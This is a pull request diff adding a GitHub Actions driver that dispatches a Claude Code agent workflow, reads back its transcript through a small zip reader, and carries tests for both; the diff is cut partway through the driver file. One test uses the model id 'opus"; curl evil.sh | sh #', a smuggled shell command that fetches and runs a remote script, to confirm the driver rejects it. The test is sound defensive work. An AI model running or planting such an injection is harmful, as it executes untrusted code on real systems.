### PR TITLE
spike(framework): ActionsDriver, run the agent on GitHub Actions (#610)

### DIFF
--- a/.github/workflows/framework-agent.yml
+++ b/.github/workflows/framework-agent.yml
@@ -1,0 +1,93 @@
+# The workflow ActionsDriver dispatches (#610): one run is one `prompt()` turn.
+#
+# The driver cannot learn a run id from the dispatch API (it answers 204 with no body), so
+# the correlation id it generates is echoed into `run-name` and into the artifact name. That
+# is how the driver finds its own run, and it is why both must keep interpolating it.
+name: framework-agent
+run-name: framework-agent ${{ inputs.correlation_id }}
+
+on:
+  workflow_dispatch:
+    inputs:
+      prompt:
+        description: What the agent should do. Passed to the action verbatim, never through a shell.
+        required: true
+      correlation_id:
+        description: How the driver finds this run. Must appear in run-name and in the artifact name.
+        required: true
+      model:
+        description: Model id, e.g. claude-opus-4-8. Empty means the action's default.
+        required: false
+      resume_session_id:
+        description: A prior agent session id to continue instead of starting fresh.
+        required: false
+
+# The agent pushes a branch and may open a PR; nothing here needs write access to anything else.
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  agent:
+    runs-on: ubuntu-latest
+    # Well under the 6h job cap. A turn that runs this long has gone wrong.
+    timeout-minutes: 60
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          # Full history: the agent reads the log to understand what it is changing.
+          fetch-depth: 0
+
+      # Built from environment variables rather than by interpolating ${{ }} into the shell,
+      # so a crafted input cannot become a command. The driver validates them too.
+      - name: Compose agent arguments
+        id: args
+        env:
+          MODEL: ${{ inputs.model }}
+          RESUME: ${{ inputs.resume_session_id }}
+        run: |
+          set -euo pipefail
+          # Agent mode grants no permissions by default, so an unattended run cannot edit
+          # or run anything without this. The runner is disposable, which is what makes it safe.
+          args="--dangerously-skip-permissions"
+          # Written as `if` rather than `[ .. ] && ..`, which returns non-zero when the input
+          # is empty and would fail the step under `set -e`.
+          if [ -n "$MODEL" ]; then args="$args --model $MODEL"; fi
+          if [ -n "$RESUME" ]; then args="$args --resume $RESUME"; fi
+          echo "value=$args" >> "$GITHUB_OUTPUT"
+
+      - name: Run the agent
+        id: claude
+        uses: anthropics/claude-code-action@v1
+        with:
+          # A `claude setup-token` OAuth token: the run spends the subscription, not an API key (#495).
+          claude_code_oauth_token: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
+          prompt: ${{ inputs.prompt }}
+          claude_args: ${{ steps.args.outputs.value }}
+
+      # The only REST-readable channel out of a run. `always()` so a failed turn still
+      # returns its transcript, which is exactly when we most want to read it.
+      - name: Collect the transcript
+        if: always()
+        env:
+          EXECUTION_FILE: ${{ steps.claude.outputs.execution_file }}
+          BRANCH: ${{ steps.claude.outputs.branch_name }}
+          SESSION_ID: ${{ steps.claude.outputs.session_id }}
+        run: |
+          set -euo pipefail
+          mkdir -p .framework-run
+          # An empty array still parses, so a crashed action yields an empty turn, not a driver error.
+          if [ -n "$EXECUTION_FILE" ] && [ -f "$EXECUTION_FILE" ]; then
+            cp "$EXECUTION_FILE" .framework-run/execution.json
+          else
+            echo '[]' > .framework-run/execution.json
+          fi
+          jq -n --arg branch "$BRANCH" --arg session_id "$SESSION_ID" \
+            '{branch: $branch, session_id: $session_id}' > .framework-run/meta.json
+
+      - uses: actions/upload-artifact@v4
+        if: always()
+        with:
+          name: framework-run-${{ inputs.correlation_id }}
+          path: .framework-run
+          retention-days: 7

--- a/packages/framework/src/driver/actions-zip.test.ts
+++ b/packages/framework/src/driver/actions-zip.test.ts
@@ -1,0 +1,105 @@
+import { strict as assert } from 'node:assert'
+import { test } from 'node:test'
+import { deflateRawSync } from 'node:zlib'
+import { readZip } from './actions-zip.js'
+
+/**
+ * Assemble a real zip archive, since Node can read deflate but neither write nor read a zip,
+ * and shelling out to `zip` would not survive Windows. Byte-for-byte what upload-artifact
+ * produces for a small directory, including the CRCs the reader ignores.
+ */
+function makeZip(files: { name: string; body: string; store?: boolean }[]): Buffer {
+  const locals: Buffer[] = []
+  const centrals: Buffer[] = []
+  let offset = 0
+
+  for (const file of files) {
+    const raw = Buffer.from(file.body, 'utf8')
+    const data = file.store ? raw : deflateRawSync(raw)
+    const name = Buffer.from(file.name, 'utf8')
+    const method = file.store ? 0 : 8
+    const crc = crc32(raw)
+
+    const local = Buffer.alloc(30)
+    local.writeUInt32LE(0x04034b50, 0)
+    local.writeUInt16LE(20, 4) // version needed
+    local.writeUInt16LE(method, 8)
+    local.writeUInt32LE(crc, 14)
+    local.writeUInt32LE(data.length, 18)
+    local.writeUInt32LE(raw.length, 22)
+    local.writeUInt16LE(name.length, 26)
+    locals.push(local, name, data)
+
+    const central = Buffer.alloc(46)
+    central.writeUInt32LE(0x02014b50, 0)
+    central.writeUInt16LE(20, 6)
+    central.writeUInt16LE(method, 10)
+    central.writeUInt32LE(crc, 16)
+    central.writeUInt32LE(data.length, 20)
+    central.writeUInt32LE(raw.length, 24)
+    central.writeUInt16LE(name.length, 28)
+    central.writeUInt32LE(offset, 42)
+    centrals.push(central, name)
+
+    offset += local.length + name.length + data.length
+  }
+
+  const centralBytes = Buffer.concat(centrals)
+  const eocd = Buffer.alloc(22)
+  eocd.writeUInt32LE(0x06054b50, 0)
+  eocd.writeUInt16LE(files.length, 8)
+  eocd.writeUInt16LE(files.length, 10)
+  eocd.writeUInt32LE(centralBytes.length, 12)
+  eocd.writeUInt32LE(offset, 16)
+  return Buffer.concat([...locals, centralBytes, eocd])
+}
+
+function crc32(buf: Buffer): number {
+  let crc = 0xffffffff
+  for (const byte of buf) {
+    crc ^= byte
+    for (let i = 0; i < 8; i++) crc = crc & 1 ? (crc >>> 1) ^ 0xedb88320 : crc >>> 1
+  }
+  return (crc ^ 0xffffffff) >>> 0
+}
+
+test('readZip reads the deflated entries an artifact download contains (#610)', () => {
+  const zip = makeZip([
+    { name: 'execution.json', body: '[{"type":"result","result":"done"}]' },
+    { name: 'meta.json', body: '{"branch":"claude/x"}' },
+  ])
+  const entries = readZip(zip)
+  assert.deepEqual(
+    entries.map(e => e.name),
+    ['execution.json', 'meta.json'],
+  )
+  assert.equal(entries[0]!.data.toString('utf8'), '[{"type":"result","result":"done"}]')
+  assert.equal(entries[1]!.data.toString('utf8'), '{"branch":"claude/x"}')
+})
+
+test('readZip reads stored entries, which is what tiny files get (#610)', () => {
+  const entries = readZip(makeZip([{ name: 'meta.json', body: '{}', store: true }]))
+  assert.equal(entries[0]!.data.toString('utf8'), '{}')
+})
+
+test('readZip survives a transcript larger than one deflate block (#610)', () => {
+  // A real transcript is tens of thousands of lines; a fixture that fits in a single
+  // block would not exercise the inflate path the way an actual run does.
+  const body = JSON.stringify(Array.from({ length: 5000 }, (_, i) => ({ type: 'assistant', i })))
+  const entries = readZip(makeZip([{ name: 'execution.json', body }]))
+  assert.equal(entries[0]!.data.toString('utf8'), body)
+})
+
+test('readZip refuses anything that is not an archive rather than reading it short (#610)', () => {
+  // A short read would look like an agent that said less than it did, so it must throw.
+  assert.throws(() => readZip(Buffer.from('not a zip at all, just some bytes')), /no end-of-central-directory/)
+  assert.throws(() => readZip(Buffer.alloc(4)), /too short/)
+})
+
+test('readZip finds the record even when the archive carries a comment (#610)', () => {
+  const zip = makeZip([{ name: 'meta.json', body: '{"branch":"b"}' }])
+  const comment = Buffer.from('uploaded by actions/upload-artifact', 'utf8')
+  const withComment = Buffer.concat([zip, comment])
+  withComment.writeUInt16LE(comment.length, withComment.length - comment.length - 2)
+  assert.equal(readZip(withComment)[0]!.data.toString('utf8'), '{"branch":"b"}')
+})

--- a/packages/framework/src/driver/actions-zip.ts
+++ b/packages/framework/src/driver/actions-zip.ts
@@ -1,0 +1,79 @@
+import { inflateRawSync } from 'node:zlib'
+
+// A minimal zip reader, for one job: the GitHub artifact download API always returns a zip,
+// even for a single file, and that is the only REST-readable channel out of an Actions run
+// (#610). Node ships deflate but no zip, and the framework has no runtime dependencies worth
+// adding for ~60 lines. Reading only, and only what upload-artifact writes: stored or
+// deflated entries, no zip64, no encryption.
+
+/** One file inside a zip. */
+export interface ZipEntry {
+  /** Path as recorded in the archive, e.g. `"execution.json"`. */
+  name: string
+  /** The decompressed bytes. */
+  data: Buffer
+}
+
+const EOCD_SIGNATURE = 0x06054b50
+const CENTRAL_SIGNATURE = 0x02014b50
+const LOCAL_SIGNATURE = 0x04034b50
+/** End-of-central-directory record, without a trailing comment. */
+const EOCD_SIZE = 22
+
+/**
+ * Read every entry out of a zip archive.
+ *
+ * Walks the central directory rather than scanning for local headers: the central
+ * directory is the authoritative listing, and a local header may declare sizes of 0
+ * and defer them to a data descriptor, which the central copy never does.
+ *
+ * Throws on anything it does not recognize rather than returning a partial archive —
+ * a silently-short transcript would read as an agent that said less than it did.
+ */
+export function readZip(buf: Buffer): ZipEntry[] {
+  const eocd = findEocd(buf)
+  const count = buf.readUInt16LE(eocd + 10)
+  let cursor = buf.readUInt32LE(eocd + 16)
+  const entries: ZipEntry[] = []
+
+  for (let i = 0; i < count; i++) {
+    if (buf.readUInt32LE(cursor) !== CENTRAL_SIGNATURE) throw new Error(`zip: bad central directory entry at ${cursor}`)
+    const method = buf.readUInt16LE(cursor + 10)
+    const compressedSize = buf.readUInt32LE(cursor + 20)
+    const nameLength = buf.readUInt16LE(cursor + 28)
+    const extraLength = buf.readUInt16LE(cursor + 30)
+    const commentLength = buf.readUInt16LE(cursor + 32)
+    const localOffset = buf.readUInt32LE(cursor + 42)
+    const name = buf.toString('utf8', cursor + 46, cursor + 46 + nameLength)
+
+    entries.push({ name, data: readLocalEntry(buf, localOffset, method, compressedSize, name) })
+    cursor += 46 + nameLength + extraLength + commentLength
+  }
+  return entries
+}
+
+/** The bytes of one entry, found via its local header (whose extra field may differ from the central one). */
+function readLocalEntry(buf: Buffer, offset: number, method: number, compressedSize: number, name: string): Buffer {
+  if (buf.readUInt32LE(offset) !== LOCAL_SIGNATURE) throw new Error(`zip: bad local header for ${name}`)
+  const start = offset + 30 + buf.readUInt16LE(offset + 26) + buf.readUInt16LE(offset + 28)
+  const raw = buf.subarray(start, start + compressedSize)
+  if (method === 0) return Buffer.from(raw) // Stored: upload-artifact does this for tiny files.
+  if (method === 8) return inflateRawSync(raw)
+  throw new Error(`zip: unsupported compression method ${method} for ${name}`)
+}
+
+/**
+ * Locate the end-of-central-directory record. It sits at the very end unless the archive
+ * carries a comment, so try the common case first and only then scan backwards.
+ */
+function findEocd(buf: Buffer): number {
+  if (buf.length < EOCD_SIZE) throw new Error('zip: too short to be an archive')
+  const flush = buf.length - EOCD_SIZE
+  if (buf.readUInt32LE(flush) === EOCD_SIGNATURE) return flush
+  // A comment can be at most 0xffff bytes, so the record cannot be further back than that.
+  const floor = Math.max(0, buf.length - 0xffff - EOCD_SIZE)
+  for (let i = flush - 1; i >= floor; i--) {
+    if (buf.readUInt32LE(i) === EOCD_SIGNATURE) return i
+  }
+  throw new Error('zip: no end-of-central-directory record (not a zip archive?)')
+}

--- a/packages/framework/src/driver/actions.test.ts
+++ b/packages/framework/src/driver/actions.test.ts
@@ -1,0 +1,274 @@
+import { strict as assert } from 'node:assert'
+import { test } from 'node:test'
+import { ActionsDriver, replayTranscript, type FetchLike } from './actions.js'
+import type { Driver, DriverEvent } from './types.js'
+
+/**
+ * A real `claude-code-action@v1` `execution_file`, trimmed: the same SDKMessage objects the
+ * CLI prints one per line, wrapped in an array. That array-vs-JSONL difference is the entire
+ * adapter, which is what makes this driver cheap.
+ */
+const EXECUTION = JSON.stringify([
+  { type: 'system', subtype: 'init', session_id: 'sess-abc' },
+  { type: 'assistant', session_id: 'sess-abc', message: { content: [{ type: 'text', text: 'Adding the flag.' }] } },
+  { type: 'assistant', session_id: 'sess-abc', message: { content: [{ type: 'tool_use', name: 'Edit' }] } },
+  {
+    type: 'result',
+    subtype: 'success',
+    session_id: 'sess-abc',
+    result: 'Added the --verbose flag.',
+    total_cost_usd: 0.42,
+    usage: { input_tokens: 120, output_tokens: 30, cache_read_input_tokens: 900, cache_creation_input_tokens: 40 },
+  },
+])
+
+/** A minimal stored (uncompressed) zip, which is what the artifact download returns. */
+function makeZip(files: { name: string; body: string }[]): Buffer {
+  const locals: Buffer[] = []
+  const centrals: Buffer[] = []
+  let offset = 0
+  for (const file of files) {
+    const data = Buffer.from(file.body, 'utf8')
+    const name = Buffer.from(file.name, 'utf8')
+    const local = Buffer.alloc(30)
+    local.writeUInt32LE(0x04034b50, 0)
+    local.writeUInt32LE(data.length, 18)
+    local.writeUInt32LE(data.length, 22)
+    local.writeUInt16LE(name.length, 26)
+    locals.push(local, name, data)
+    const central = Buffer.alloc(46)
+    central.writeUInt32LE(0x02014b50, 0)
+    central.writeUInt32LE(data.length, 20)
+    central.writeUInt32LE(data.length, 24)
+    central.writeUInt16LE(name.length, 28)
+    central.writeUInt32LE(offset, 42)
+    centrals.push(central, name)
+    offset += local.length + name.length + data.length
+  }
+  const centralBytes = Buffer.concat(centrals)
+  const eocd = Buffer.alloc(22)
+  eocd.writeUInt32LE(0x06054b50, 0)
+  eocd.writeUInt16LE(files.length, 8)
+  eocd.writeUInt16LE(files.length, 10)
+  eocd.writeUInt32LE(centralBytes.length, 12)
+  eocd.writeUInt32LE(offset, 16)
+  return Buffer.concat([...locals, centralBytes, eocd])
+}
+
+interface Call {
+  url: string
+  method: string
+  body: unknown
+}
+
+interface FakeOptions {
+  /** Statuses the run reports on successive polls. Default: completed straight away. */
+  runs?: { status: string; conclusion?: string }[]
+  execution?: string
+  meta?: string
+  /** Files the contents API serves, by path. */
+  contents?: Record<string, string>
+}
+
+/** A GitHub REST double that records every call. */
+function fakeGitHub(opts: FakeOptions = {}): { fetch: FetchLike; calls: Call[] } {
+  const calls: Call[] = []
+  const runs = opts.runs ?? [{ status: 'completed', conclusion: 'success' }]
+  let poll = 0
+
+  const json = (body: unknown): Response => ({ ok: true, status: 200, statusText: 'OK', json: async () => body }) as unknown as Response
+
+  const fetch: FetchLike = async (url, init = {}) => {
+    const method = init.method ?? 'GET'
+    calls.push({ url, method, body: typeof init.body === 'string' ? JSON.parse(init.body) : undefined })
+
+    if (url.includes('/dispatches')) return { ok: true, status: 204, statusText: 'No Content' } as unknown as Response
+
+    if (url.includes('/actions/runs?')) {
+      const state = runs[Math.min(poll++, runs.length - 1)]!
+      // The run we are looking for is the one the *latest* dispatch created, not the first:
+      // a second turn polls for its own correlation id, never the previous turn's.
+      const correlation = calls.filter(c => c.url.includes('/dispatches')).at(-1)?.body as { inputs?: { correlation_id?: string } } | undefined
+      return json({
+        workflow_runs: [
+          { id: 77, name: `framework-agent ${correlation?.inputs?.correlation_id}`, status: state.status, conclusion: state.conclusion ?? null, html_url: 'https://github.com/o/r/actions/runs/77' },
+        ],
+      })
+    }
+
+    if (url.includes('/artifacts') && !url.endsWith('/zip')) return json({ artifacts: [{ id: 5, name: 'framework-run-actions-1-turn-1' }] })
+
+    if (url.endsWith('/zip')) {
+      const zip = makeZip([
+        { name: 'execution.json', body: opts.execution ?? EXECUTION },
+        { name: 'meta.json', body: opts.meta ?? JSON.stringify({ branch: 'claude/issue-610', session_id: 'sess-abc' }) },
+      ])
+      return { ok: true, status: 200, statusText: 'OK', arrayBuffer: async () => zip.buffer.slice(zip.byteOffset, zip.byteOffset + zip.byteLength) } as unknown as Response
+    }
+
+    if (url.includes('/contents/')) {
+      const path = decodeURIComponent(url.split('/contents/')[1]!.split('?')[0]!)
+      const body = opts.contents?.[path]
+      if (body === undefined) return { ok: false, status: 404, statusText: 'Not Found', text: async () => 'not found' } as unknown as Response
+      return json({ content: Buffer.from(body, 'utf8').toString('base64'), encoding: 'base64' })
+    }
+
+    throw new Error(`unexpected call: ${url}`)
+  }
+  return { fetch, calls }
+}
+
+function makeDriver(opts: FakeOptions = {}): { driver: ActionsDriver; calls: Call[] } {
+  const { fetch, calls } = fakeGitHub(opts)
+  // A fake clock that only the sleeps advance, so polling costs no wall-clock time and a run
+  // that never finishes fails the test in ten polls instead of spinning for the real timeout.
+  let clock = 0
+  const driver = new ActionsDriver({
+    owner: 'o',
+    repo: 'r',
+    token: 't',
+    fetch,
+    pollIntervalMs: 1000,
+    timeoutMs: 10_000,
+    now: () => clock,
+    sleep: async ms => void (clock += ms),
+  })
+  return { driver, calls }
+}
+
+test('ActionsDriver dispatches, polls, and returns the run transcript as a turn (#610)', async () => {
+  const { driver, calls } = makeDriver({ runs: [{ status: 'queued' }, { status: 'in_progress' }, { status: 'completed', conclusion: 'success' }] })
+  const session = await driver.start({ cwd: '/ws' })
+  const turn = await session.prompt('add a --verbose flag')
+
+  assert.equal(turn.text, 'Added the --verbose flag.')
+  assert.equal(turn.sessionId, 'sess-abc')
+  assert.deepEqual(turn.usage, { costUsd: 0.42, inputTokens: 120, outputTokens: 30, cacheReadTokens: 900, cacheCreationTokens: 40 })
+  // It kept polling while the run was queued and in progress, rather than reading it early.
+  assert.equal(calls.filter(c => c.url.includes('/actions/runs?')).length, 3)
+})
+
+test('ActionsDriver dispatches the prompt with a correlation id and the framing in front (#610)', async () => {
+  const { driver, calls } = makeDriver()
+  const session = await driver.start({ cwd: '/ws', system: 'You are careful.' })
+  await session.prompt('do the thing', { system: 'Also: be brief.' })
+
+  const dispatch = calls.find(c => c.url.includes('/dispatches'))!
+  assert.match(dispatch.url, /\/repos\/o\/r\/actions\/workflows\/framework-agent\.yml\/dispatches$/)
+  const body = dispatch.body as { ref: string; inputs: Record<string, string> }
+  assert.equal(body.ref, 'main')
+  // The action takes the prompt as an input, so the framing can ride in front of it safely.
+  assert.equal(body.inputs['prompt'], 'You are careful.\n\nAlso: be brief.\n\ndo the thing')
+  // The dispatch API returns no run id, so the correlation id is the only way back to the run.
+  assert.equal(body.inputs['correlation_id'], `${session.id}-turn-1`)
+})
+
+test('ActionsDriver runs the next turn on the branch the last one pushed (#610)', async () => {
+  const { driver, calls } = makeDriver()
+  const session = await driver.start({ cwd: '/ws' })
+  await session.prompt('first')
+  await session.prompt('second')
+
+  const dispatches = calls.filter(c => c.url.includes('/dispatches')).map(c => c.body as { ref: string })
+  // Every turn is a fresh runner and a fresh checkout, so continuity is the branch, not the machine.
+  assert.deepEqual(
+    dispatches.map(d => d.ref),
+    ['main', 'claude/issue-610'],
+  )
+})
+
+test('ActionsDriver continues the agent session when the turn asks to resume (#714, #720)', async () => {
+  const { driver, calls } = makeDriver()
+  const session = await driver.start({ cwd: '/ws' })
+  await session.prompt('first')
+  await session.prompt('follow-up', { resume: true })
+
+  const inputs = calls.filter(c => c.url.includes('/dispatches')).map(c => (c.body as { inputs: Record<string, string> }).inputs)
+  assert.equal(inputs[0]!['resume_session_id'], undefined)
+  assert.equal(inputs[1]!['resume_session_id'], 'sess-abc')
+})
+
+test('ActionsDriver passes the model through (#628)', async () => {
+  const { driver, calls } = makeDriver()
+  const session = await driver.start({ cwd: '/ws', model: 'claude-opus-4-8' })
+  await session.prompt('go')
+  assert.equal((calls.find(c => c.url.includes('/dispatches'))!.body as { inputs: Record<string, string> }).inputs['model'], 'claude-opus-4-8')
+})
+
+test('ActionsDriver refuses a model id that could break out of the runner shell (#610)', async () => {
+  const { driver } = makeDriver()
+  const session = await driver.start({ cwd: '/ws', model: 'opus"; curl evil.sh | sh #' })
+  // The workflow composes its args from environment variables, and this is the belt to that
+  // brace: an id that is not an id never reaches the runner at all.
+  await assert.rejects(() => session.prompt('go'), /Refusing to pass an unsafe model/)
+})
+
+test('ActionsDriver fails the turn when the run does, naming the run (#610)', async () => {
+  const { driver } = makeDriver({ runs: [{ status: 'completed', conclusion: 'failure' }] })
+  const session = await driver.start({ cwd: '/ws' })
+  // A red run must not pass as a result, and the URL is the only way to see why it went red.
+  await assert.rejects(() => session.prompt('go'), /concluded "failure".*runs\/77/s)
+})
+
+test('ActionsDriver gives up rather than polling a run forever (#610)', async () => {
+  const { fetch } = fakeGitHub({ runs: [{ status: 'in_progress' }] })
+  let clock = 0
+  const driver = new ActionsDriver({ owner: 'o', repo: 'r', token: 't', fetch, pollIntervalMs: 1000, timeoutMs: 5000, now: () => clock, sleep: async ms => void (clock += ms) })
+  const session = await driver.start({ cwd: '/ws' })
+  await assert.rejects(() => session.prompt('go'), /Timed out waiting/)
+})
+
+test('ActionsDriver reads produced code off the pushed branch, since the runner is gone (#610)', async () => {
+  const { driver, calls } = makeDriver({ contents: { 'src/cli.ts': 'export const verbose = true\n' } })
+  const session = await driver.start({ cwd: '/ws' })
+  await session.prompt('go')
+
+  assert.equal(await session.readCode!('src/cli.ts'), 'export const verbose = true\n')
+  // Read from the branch the run pushed, not from the default branch.
+  assert.match(calls.at(-1)!.url, /\/contents\/src\/cli\.ts\?ref=claude%2Fissue-610$/)
+})
+
+test('ActionsDriver says so plainly when there is no branch to read code from yet (#610)', async () => {
+  const { driver } = makeDriver()
+  const session = await driver.start({ cwd: '/ws' })
+  await assert.rejects(() => session.readCode!('src/cli.ts'), /only available after a run has pushed one/)
+})
+
+test('ActionsDriver replays the run events for the dashboard, in a burst at the end (#610)', async () => {
+  const events: DriverEvent[] = []
+  const { driver } = makeDriver()
+  const session = await driver.start({ cwd: '/ws', onEvent: e => events.push(e) })
+  await session.prompt('go')
+
+  assert.equal(events[0]?.type, 'start')
+  assert.ok(events.some(e => e.type === 'text' && e.text === 'Adding the flag.'))
+  assert.ok(events.some(e => e.type === 'action' && e.label === 'Edit'))
+  assert.ok(events.some(e => e.type === 'action' && e.label.includes('runs/77')))
+  assert.equal(events.at(-1)?.type, 'result')
+})
+
+test('ActionsDriver cannot report a quota, so it says so by omission (#610)', () => {
+  // The quota belongs to whichever account's token the repo holds, and the runner that
+  // could have answered is torn down before we ever read it.
+  const driver: Driver = new ActionsDriver({ owner: 'o', repo: 'r', token: 't' })
+  assert.equal(driver.readQuota, undefined)
+})
+
+test('replayTranscript reads the action execution file with the existing stream parser (#610)', () => {
+  const events: DriverEvent[] = []
+  const turn = replayTranscript(EXECUTION, e => events.push(e))
+  assert.equal(turn.text, 'Added the --verbose flag.')
+  assert.equal(turn.sessionId, 'sess-abc')
+  assert.deepEqual(
+    events.map(e => e.type),
+    ['text', 'action'],
+  )
+})
+
+test('replayTranscript rejects a transcript that is not a message array (#610)', () => {
+  // An empty turn from a crashed run is fine; a silently-empty turn from a shape we did
+  // not recognize is not, since it would read as an agent that did nothing.
+  assert.deepEqual(replayTranscript('[]'), { text: '' })
+  assert.throws(() => replayTranscript('{"type":"result"}'), /not a JSON array/)
+  assert.throws(() => replayTranscript('not json'), /Could not parse the run transcript/)
+})

--- a/packages/framework/src/driver/actions.ts
+++ b/packages/framework/src/driver/actions.ts
@@ -1,0 +1,302 @@
+import { StreamJsonParser } from './claude-code.js'
+import { readZip } from './actions-zip.js'
+import { combineFraming, makeEmit } from './session-support.js'
+import type { Driver, DriverEvent, DriverPromptOptions, DriverSession, DriverStartOptions, DriverTurn } from './types.js'
+
+/**
+ * A {@link Driver} that runs the agent on **GitHub Actions** instead of on this
+ * machine (#610): dispatch a workflow, poll it, read the transcript it uploads.
+ *
+ * This is the answer to "drive Claude Code on the web". The routines fire API was
+ * the obvious candidate and turned out unusable — the prompt arrives wrapped as
+ * untrusted data, and there is no read-back of any kind. The official
+ * `anthropics/claude-code-action@v1` has neither problem: the prompt is passed
+ * verbatim, and the run publishes its full transcript. Auth is the same
+ * subscription posture as everywhere else (#495): a `claude setup-token` OAuth
+ * token held by the repo, never an API key of ours.
+ *
+ * It fits `Driver`/`DriverSession` as written, with no new methods. What changes is
+ * not the shape but the tempo, and those costs are real:
+ *
+ * - **Minutes, not seconds.** Every `prompt` is a fresh runner and a fresh
+ *   checkout. Continuity comes from the branch the previous turn pushed, which the
+ *   session tracks and dispatches onto next time.
+ * - **No live stream.** The transcript arrives once, at the end, so the dashboard's
+ *   {@link DriverStartOptions.onEvent} feed replays in a burst rather than trickling.
+ * - **Quota is the account's, not the runner's.** Free minutes on a public repo
+ *   change nothing about the subscription window every run draws down.
+ *
+ * The workspace lives on a runner that is gone by the time we read it, so
+ * {@link ActionsSession.readCode} reads from the pushed branch over the contents
+ * API rather than from disk.
+ */
+export class ActionsDriver implements Driver {
+  readonly name = 'github-actions'
+  constructor(private readonly opts: ActionsDriverOptions) {}
+
+  start(opts: DriverStartOptions): Promise<DriverSession> {
+    return Promise.resolve(new ActionsSession(this.opts, opts))
+  }
+
+  // No `readQuota`: the quota belongs to whichever account's OAuth token the repo
+  // holds, and we cannot run `/usage` on a runner that has already been torn down.
+}
+
+/** Options for {@link ActionsDriver}. */
+export interface ActionsDriverOptions {
+  /** Repository owner (user or org) that runs the workflow. */
+  owner: string
+  /** Repository name. */
+  repo: string
+  /**
+   * GitHub token used to dispatch and to read runs, artifacts, and file contents.
+   * Needs `repo` + `workflow` scope. Must belong to a **user**, not an App: the
+   * action's `checkHumanActor` rejects a bot-triggered agent run unless the bot is
+   * in its `allowed_bots`.
+   */
+  token: string
+  /** Workflow file to dispatch. Default `"framework-agent.yml"`. */
+  workflow?: string
+  /** Git ref the first turn runs on. Later turns follow the branch the agent pushed. */
+  ref?: string
+  /** How often to poll the run, in ms. Default 5000. */
+  pollIntervalMs?: number
+  /** Give up on a run after this long, in ms. Default 1 hour (the job cap is 6). */
+  timeoutMs?: number
+  /** REST base. Default `"https://api.github.com"`. */
+  apiBase?: string
+  /** `fetch` override for tests. Default the global. */
+  fetch?: FetchLike
+  /** Clock override for tests. Default `Date.now`. */
+  now?: () => number
+  /** Sleep override for tests. Default a real timer. */
+  sleep?: (ms: number) => Promise<void>
+}
+
+/** The slice of `fetch` this driver uses. */
+export type FetchLike = (url: string, init?: RequestInit) => Promise<Response>
+
+let sessionCounter = 0
+
+/** One Actions-backed session. Each `prompt` is one workflow run. */
+export class ActionsSession implements DriverSession {
+  readonly id: string
+  readonly cwd: string
+  /** The branch the last successful run pushed; the next turn builds on it. */
+  private branch: string | undefined
+  /** The agent's own session id, carried across turns so `resume` can continue it. */
+  private lastSessionId: string | undefined
+  private turnCounter = 0
+
+  constructor(
+    private readonly config: ActionsDriverOptions,
+    private readonly startOpts: DriverStartOptions,
+  ) {
+    this.cwd = startOpts.cwd
+    this.id = `actions-${++sessionCounter}`
+    this.lastSessionId = startOpts.resumeSessionId
+  }
+
+  async prompt(text: string, opts: DriverPromptOptions = {}): Promise<DriverTurn> {
+    const emit = makeEmit(this.startOpts.onEvent, 'github-actions')
+    // The action takes `prompt` as an action input, not through a shell, so a
+    // multi-line prompt is safe. The framing rides in front of it (as with Codex):
+    // `--append-system-prompt` would have to survive shell-quoting inside the
+    // workflow, and a system prompt is not worth an injection seam.
+    const framing = combineFraming(this.startOpts.system, opts.system)
+    const prompt = framing ? `${framing}\n\n${text}` : text
+    emit({ type: 'start', prompt })
+
+    // Deterministic, so no clock or randomness leaks into the correlation: the
+    // dispatch API returns no run id, and this is how we find our run among others.
+    const correlationId = `${this.id}-turn-${++this.turnCounter}`
+    const resume = opts.resume ? this.lastSessionId : undefined
+
+    await this.dispatch(prompt, correlationId, resume)
+    emit({ type: 'notice', message: `Dispatched ${correlationId} to ${this.config.owner}/${this.config.repo}; waiting for the runner.` })
+
+    const run = await this.awaitRun(correlationId, emit)
+    const artifact = await this.readRunArtifact(run.id, correlationId)
+    if (artifact.branch) this.branch = artifact.branch
+
+    const turn = replayTranscript(artifact.execution, emit)
+    if (turn.sessionId) this.lastSessionId = turn.sessionId
+    emit({ type: 'result', text: turn.text, ...(turn.sessionId ? { sessionId: turn.sessionId } : {}), ...(turn.usage ? { usage: turn.usage } : {}) })
+    return turn
+  }
+
+  /**
+   * Read a file the agent produced. The runner is gone, so this reads the branch the
+   * run pushed rather than the local workspace — the seam is still the code, just
+   * fetched over the contents API.
+   */
+  async readCode(path: string): Promise<string> {
+    if (!this.branch) throw new Error('No branch yet: readCode is only available after a run has pushed one.')
+    const encoded = path.split('/').map(encodeURIComponent).join('/')
+    const body = await this.api<{ content?: string; encoding?: string }>(`/repos/${this.owner}/contents/${encoded}?ref=${encodeURIComponent(this.branch)}`)
+    if (typeof body.content !== 'string') throw new Error(`${path} is not a file on ${this.branch}`)
+    return Buffer.from(body.content, body.encoding === 'base64' ? 'base64' : 'utf8').toString('utf8')
+  }
+
+  dispose(): Promise<void> {
+    // Every run reaps itself on the runner; there is nothing here to free.
+    return Promise.resolve()
+  }
+
+  /** Fire the workflow. Returns nothing useful: dispatch is 204 with no body, hence the correlation id. */
+  private async dispatch(prompt: string, correlationId: string, resume: string | undefined): Promise<void> {
+    const workflow = this.config.workflow ?? 'framework-agent.yml'
+    const inputs: Record<string, string> = { prompt, correlation_id: correlationId }
+    // These reach a shell on the runner as environment variables. They are ids and
+    // model names, so anything outside that alphabet is a bug or an attack.
+    if (this.startOpts.model) inputs['model'] = assertToken(this.startOpts.model, 'model')
+    if (resume) inputs['resume_session_id'] = assertToken(resume, 'resume session id')
+    await this.api(`/repos/${this.owner}/actions/workflows/${encodeURIComponent(workflow)}/dispatches`, {
+      method: 'POST',
+      body: JSON.stringify({ ref: this.branch ?? this.config.ref ?? 'main', inputs }),
+    })
+  }
+
+  /** Poll until our run appears and finishes. Identified by the correlation id in its `run-name`. */
+  private async awaitRun(correlationId: string, emit: (event: DriverEvent) => void): Promise<WorkflowRun> {
+    const now = this.config.now ?? Date.now
+    const sleep = this.config.sleep ?? (ms => new Promise<void>(r => setTimeout(r, ms)))
+    const interval = this.config.pollIntervalMs ?? 5000
+    const deadline = now() + (this.config.timeoutMs ?? 60 * 60 * 1000)
+    let announced = false
+
+    for (;;) {
+      const found = await this.findRun(correlationId)
+      if (found) {
+        if (!announced) {
+          announced = true
+          emit({ type: 'action', label: `run ${found.html_url}` })
+        }
+        if (found.status === 'completed') {
+          if (found.conclusion !== 'success') throw new Error(`GitHub Actions run concluded "${found.conclusion}": ${found.html_url}`)
+          return found
+        }
+      }
